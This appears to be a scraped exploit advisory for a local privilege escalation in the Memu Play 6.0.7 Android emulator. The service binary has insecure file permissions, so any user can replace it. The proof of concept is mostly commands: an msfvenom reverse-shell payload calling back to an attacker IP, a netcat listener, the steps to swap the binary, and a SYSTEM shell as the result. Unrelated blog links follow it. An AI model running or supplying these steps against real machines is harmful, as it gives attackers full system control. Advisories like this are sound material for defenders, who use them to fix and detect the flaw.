# Exploit Title: Memu Play 6.0. - Privilege Escalation (PoC)

# Date: //

# Author: Alejandra Sánchez

# Vendor Homepage: https://www.memuplay.com/

# Software Link: https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release

# Version: 6.0.

# Tested on: Windows  / Windows 

# Description:

#  Memu Play 6.0. suffers from Privilege Escalation due to insecure file permissions

# Prerequisites

# Local, Low privilege access with restart capabilities

# Details

# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.

# A low privilege account is able to rename the MemuService.exe file located in this same path and replace

# with a malicious file that would connect back to an attacking computer giving system level privileges

# (nt authority\system) due to the service running as Local System.

# While a low privilege user is unable to restart the service through the application, a restart of the

# computer triggers the execution of the malicious file.

C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"

C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F)

                                                      BUILTIN\Administrators:(I)(F)

                                                      BUILTIN\Users:(I)(F)

                                                      NT AUTHORITY\SYSTEM:(I)(F)

Successfully processed  files; Failed processing  files

C:\>sc qc MEmuSVC

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MEmuSVC

        TYPE               :   WIN32_OWN_PROCESS

        START_TYPE         :    AUTO_START

        ERROR_CONTROL      :    NORMAL

        BINARY_PATH_NAME   : C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe

        LOAD_ORDER_GROUP   :

        TAG                : 

# Proof of Concept

. Generate malicious .exe on attacking machine

    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT= -f exe > /var/www/html/MemuService.exe

. Setup listener and ensure apache is running on attacking machine

    nc -lvp

    service apache2 start

. Download malicious .exe on victim machine

    Open browser to http://192.168.1.130/MemuService.exe and download

. Overwrite file and copy malicious .exe.

    Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak

    Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\

. Restart victim machine

. Reverse Shell on attacking machine opens

    C:\Windows\system32>whoami

    whoami

    nt authority\system

[EXP]Memu Play 6.0.7 - Privilege Escalation的更多相关文章

  1. [EXP]Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation

    Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master) Platform: Windows (not tested ...

  2. karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

    catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...

  3. Linux/Unix System Level Attack、Privilege Escalation(undone)

    目录 . How To Start A System Level Attack . Remote Access Attack . Local Access Attack . After Get Roo ...

  4. FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit

    /* * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit * Author by CurcolHekerLink * * Th ...

  5. Basic Linux Privilege Escalation

    (Linux) privilege escalation is all about: Collect - Enumeration, more enumeration and some more enu ...

  6. CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

    /**  * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC  *  * Vitaly Nikolenko  * http://ha ...

  7. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

  8. Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

    In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...

  9. [EXP]Microsoft Windows 10 - XmlDocument Insecure Sharing Privilege Escalation

    Windows: XmlDocument Insecure Sharing Elevation of Privilege Platform: Windows (almost certainly ear ...

随机推荐

  1. centos系统有多个内核,修改默认启动内核

    打开系统文件 vim  /boot/grub/grub.conf default=0,意思是GRUB在默认情况下,也就是用户没有选择的情况下,去启动显示在用户界面的第一个系统:GRUB启动系统时是从0 ...

  2. Python设计模式 - UML - 类图(Class Diagram)

    简介 类图是面向对象分析和设计的核心,用来描述系统各个模块中类与类之间.接口与接口之间.类与接口之间的关系,以及每个类的属性.操作等特性,一般在详细设计过程中实施. 类图本身就是现实世界的抽象,是对系 ...

  3. [leetcode]35. Search Insert Position寻找插入位置

    Given a sorted array and a target value, return the index if the target is found. If not, return the ...

  4. python的基本用法(四)文件操作使用

    #读文件,文件必须存在才能读f=open('操作文件',encoding='utf-8')res =f.read()print(res)f.close()#写文件fw=open('操作文件',mode ...

  5. MYSQL(Mariadb)

    CentOS7下安装MariaDB 添加 MariaDB yum 仓库(官网的,也可以直接用aliyun云的) vi /etc/yum.repos.d/MariaDB.repo [mariadb] n ...

  6. Thinkphp5 表单提交额外参数和页面跳转参数传递url

    1. 表单提交 <input type="hidden" name="project_name" value="$project_name&qu ...

  7. 【并发编程】IO模型

    一.要点回顾 为了更好地了解IO模型,我们需要先回顾下几个概念:同步.异步.阻塞.非阻塞 同步: 一个进程在执行某个任务时,另外一个进程必须等待其执行完毕,才能继续执行.就是在发出一个功能调用时,在没 ...

  8. Oracle使用JDBC进行增删改查 表是否存在

    Oracle使用JDBC进行增删改查 数据库和表 table USERS (   USERNAME VARCHAR2(20) not null,   PASSWORD VARCHAR2(20) ) a ...

  9. 简单利用jQuery,让前端开发不再依赖于后端的接口

    前端开发的过程中,我们免不了和后端进行联调,这时候就会出现以下的尴尬场景: 接口没写好,没法做接下来的功能 功能写好了,接口没写好,没法测这个功能 联调了,出了BUG,不知道锅在谁身上,只得陪后端耗时 ...

  10. 【Git】 GitLab配置优化及汉化

    GitLab配置 1.修改GitLab绑定的域名 a.修改/etc/gitlab/gitlab.rb配置文件,修改成自己的域名 external_url 'http://gitlab.example. ...